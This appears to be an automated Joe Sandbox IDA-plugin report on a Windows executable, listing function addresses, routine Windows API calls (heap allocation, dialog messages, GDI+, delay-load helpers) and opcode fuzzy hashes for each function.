Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 879332d6c54f4fa45878110efeaf8530620a033bc1b7ef135c4281a2b2fa6d12
Instruction ID: 87322073476e6809186283a8f7c123550a689a194166f00e33f8a61f19e9c358
Opcode Fuzzy Hash: 879332d6c54f4fa45878110efeaf8530620a033bc1b7ef135c4281a2b2fa6d12
Instruction Fuzzy Hash: 5B71BF71100B44AADB25DB34CC41EEBB7F8FB14301F44896EE29B87242DA32AA49DF51

Function 008C837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C8384

Part of subcall function 008C1380: __EH_prolog.LIBCMT ref: 008C1385
Part of subcall function 008C1380: new.LIBCMT ref: 008C13FE

Part of subcall function 008C19A6: __EH_prolog.LIBCMT ref: 008C19AB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0d185b5623c11cfa92b313424d0c45943ac18d0af685d6ca09e63c74abdd3edd
Instruction ID: 36cc79fec721a3a694e995f94b81e6d78418519b1c73e8635cb441518fda6eb6
Opcode Fuzzy Hash: 0d185b5623c11cfa92b313424d0c45943ac18d0af685d6ca09e63c74abdd3edd
Instruction Fuzzy Hash: E9419F31840658AADF24EB64C855FEA73B8FF50304F0440EEA58AD7093DF749A88DB51

Function 008C1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C1E05

Part of subcall function 008C3B3D: __EH_prolog.LIBCMT ref: 008C3B42

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fd664f57cfe073d027a04d03ce15ed3a4bc557130c9700eda45675d446ccd118
Instruction ID: b82ef8ca678284909dfe2d08a2915d11a22c2722e4c21ae9f10b98c7d805aa19
Opcode Fuzzy Hash: fd664f57cfe073d027a04d03ce15ed3a4bc557130c9700eda45675d446ccd118
Instruction Fuzzy Hash: 00212831904108AECF15EF99D999AEEBBF6FF59300B10016EE845E7252CB329E10CB61

Function 008DA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008DA7C8

Part of subcall function 008C1380: __EH_prolog.LIBCMT ref: 008C1385
Part of subcall function 008C1380: new.LIBCMT ref: 008C13FE

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 691a851b4ff5fc78ab6f2792d69f9266322e9d28ce42b68989ede4dd79ebbad9
Instruction ID: 7203d775dc30abe5213033ed6fc31f625a9191c99dd03dd56e9045e7d78f7674
Opcode Fuzzy Hash: 691a851b4ff5fc78ab6f2792d69f9266322e9d28ce42b68989ede4dd79ebbad9
Instruction Fuzzy Hash: 62212E71C042499ACF15DF58C9919EEB7B4FF1A304F5005AEE809E7342DA35AE069B62

Function 008C92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C92EB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1d7acd6c30dca918ee1046761d959f0dab44119c605db05ca1473085e83821ea
Instruction ID: 27326e9e1b8a1bbf47a347237b55c9e68eaf75185cdb919f23b1db1e691d103f
Opcode Fuzzy Hash: 1d7acd6c30dca918ee1046761d959f0dab44119c605db05ca1473085e83821ea
Instruction Fuzzy Hash: BC117C73E00568ABCB22AAACCC85EEEB736FF48750F00415DF809E7252CB34CD1186A1

Function 008C5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C5BDC

Part of subcall function 008CB07D: __EH_prolog.LIBCMT ref: 008CB082

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e27eb2725d7eb2d6973ad20ae184400b4113c89315ee6ab343e95a0ac91eab8d
Instruction ID: 7b7247087dcf88ba4a7321f064ef5c59df28b7882fd025b9e6ecc7e6c8e6db70
Opcode Fuzzy Hash: e27eb2725d7eb2d6973ad20ae184400b4113c89315ee6ab343e95a0ac91eab8d
Instruction Fuzzy Hash: 1C016D30A05694DAD725F7BCC055BEDF7B4EF29700F80519EA95A93283CBB46B08C663

Function 008E8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008EC13D,00000000,?,008E67E2,?,00000008,?,008E89AD,?,?,?), ref: 008E854A

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 398b509f86f65c35c978fb1fdd615bc4207b7e910b6ad760dc8db2e7f0f476b8
Instruction ID: a05baf7d35a8810d1db226eec7dd9f81ee903fc5c3c00f9eb384fbe786b55a6f
Opcode Fuzzy Hash: 398b509f86f65c35c978fb1fdd615bc4207b7e910b6ad760dc8db2e7f0f476b8
Instruction Fuzzy Hash: CDE06D616446E5DAEB322B6F9C01BAE7B8CFB537B0F150221AD5DE6191CF20CC0185E6

Function 008CA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008CA4F5

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 147b6e847f9864ede50710728526ed23029382fc432e76f4a1536a64c583c87b
Instruction ID: beb154275536aff1da6b2695d90164aed5ef9d71ec69044e7cbb5b3af5a1c9a6
Opcode Fuzzy Hash: 147b6e847f9864ede50710728526ed23029382fc432e76f4a1536a64c583c87b
Instruction Fuzzy Hash: B5F0B431408784AACB265BBC8804FD6BBB1FF05325F04CA4EF1F982192C27494859723

Function 008D067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 008D06B1

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 89a6010841ed2f993f794b9fd719d1b92cb43fd3f7d2b58f1f69c8ac854a6b8d
Instruction ID: 6789c9470b5cff6e072071829b2c2244cbaa63817dd50be0594b8462b4c28e9c
Opcode Fuzzy Hash: 89a6010841ed2f993f794b9fd719d1b92cb43fd3f7d2b58f1f69c8ac854a6b8d
Instruction Fuzzy Hash: 4AD0C22060821029DA25337DB809BFE1B16EFC6711F080127B20DD37868E5A4886A6A3

Function 008D9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 008D9D81

Part of subcall function 008D9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008D9B30

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 5b931c9ada13d5133dd062d8ee30ff3c9c6fa2237a92f84ad7efbe7cc5905e2f
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 20D0C73075420D7ADF41BA759C0297A7BA9FB01350F104267FC8CD6351EF71DE10A662

Function 008C9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,008C9887), ref: 008C9995

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: a4fbc487f8990b4788579e1dd3fc632452eb666752291d7aaf543329c7ed7c0e
Instruction ID: fc4697e24609d90f25d6e2892438c68f1b674a564d5577fc497cf278d1a8b502
Opcode Fuzzy Hash: a4fbc487f8990b4788579e1dd3fc632452eb666752291d7aaf543329c7ed7c0e
Instruction Fuzzy Hash: 97D01231011580A58F2146354D0DAA97F71FB83376B38C6ECD0A5C40A1DB33C807F542

Function 008DD41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 008DD43F

Part of subcall function 008DAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008DAC85
Part of subcall function 008DAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008DAC96
Part of subcall function 008DAC74: IsDialogMessageW.USER32(00010466,?), ref: 008DACAA
Part of subcall function 008DAC74: TranslateMessage.USER32(?), ref: 008DACB8
Part of subcall function 008DAC74: DispatchMessageW.USER32(?), ref: 008DACC2

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: ec9ccd31c599ecec1205f2636308e25b694a732608f93ae7a8dcec9c2faa660d
Instruction ID: 3b4de7d9ee893d9e6036ef20cda9429351b456d2bc3ab9484af0c7f0856940ac
Opcode Fuzzy Hash: ec9ccd31c599ecec1205f2636308e25b694a732608f93ae7a8dcec9c2faa660d
Instruction Fuzzy Hash: A3D09E31158300BBD6152B51CE07F1F7AA6FB88B04F004664B344B40F286729D31AB16

Function 008DD891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9d1b017e011bfc623af44eff1345a8fe6c02c50663c144198e55154a16f738f
Instruction ID: 588a665b33618bdaed79cc62671c0a0a9744ab30d5736a92f59a8631dfaffd36
Opcode Fuzzy Hash: e9d1b017e011bfc623af44eff1345a8fe6c02c50663c144198e55154a16f738f
Instruction Fuzzy Hash: 6AB012D526C3057C31083314FC52C3B031CE4C0B143304B3BB109E02C1D8406C485833

Function 008DD8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4cdf849635e402d94abfccd1a7c45c3d465c5b1a3a451a606df528af355f6837
Instruction ID: 3232eb799fe2df562152e543eeb0a4f67fad7cfdb25d14598ba7b3a4fe6f949e
Opcode Fuzzy Hash: 4cdf849635e402d94abfccd1a7c45c3d465c5b1a3a451a606df528af355f6837
Instruction Fuzzy Hash: 14B012D526C3097C31087318FC42D3B035CF4C0B14330463BB109D13C1D8406C041533

Function 008DD8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8ee6f8a65470c9367037efaae8d62b5e86b7f0c61e6aefa31df632d03f9ce110
Instruction ID: 666a9e7ec753b302eb2f05d8c9b96d949849aebbfacfff05b2c6f4a27d738cee
Opcode Fuzzy Hash: 8ee6f8a65470c9367037efaae8d62b5e86b7f0c61e6aefa31df632d03f9ce110
Instruction Fuzzy Hash: F5B012D126C3057C31087318FC02D36035CE4C1B14330C62BB509D13C1D8406C191433

Function 008DD8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c67844364efb5ca5b6609a56d9c5342a882ffa31f8de81e0cf570486a9631442
Instruction ID: e24821f843769d2bd7f6f39bcd42f894484d117bc12c85410cc80c4cd8b9c253
Opcode Fuzzy Hash: c67844364efb5ca5b6609a56d9c5342a882ffa31f8de81e0cf570486a9631442
Instruction Fuzzy Hash: E7B012D126C3057C310C7318FD03D36035CE4C0B14330862BB109E13C1D8406C1E1433

Function 008DD8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 48d0cca074a4afbdc7bc524faff4d72f3cbdee6bc50a40cc409215f0645725df
Instruction ID: aea1bbaf1cde4c43a69aa9300ba0c0b4af3ce4a9296342e57e457fa7de5b9697
Opcode Fuzzy Hash: 48d0cca074a4afbdc7bc524faff4d72f3cbdee6bc50a40cc409215f0645725df
Instruction Fuzzy Hash: 15B012D126C3057C31487318FC02D36035CE4C0B14330872BB109D13C1D8406C991433

Function 008DD8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 99ae9129ec5b1ccdeffe8d718154ee148fb74c4e84c283d5f14ef4537e07f157
Instruction ID: 1b0439e121c5c1d0dec34ae8fec6b6065cb72a1e7792ed4c20498742783a8ad3
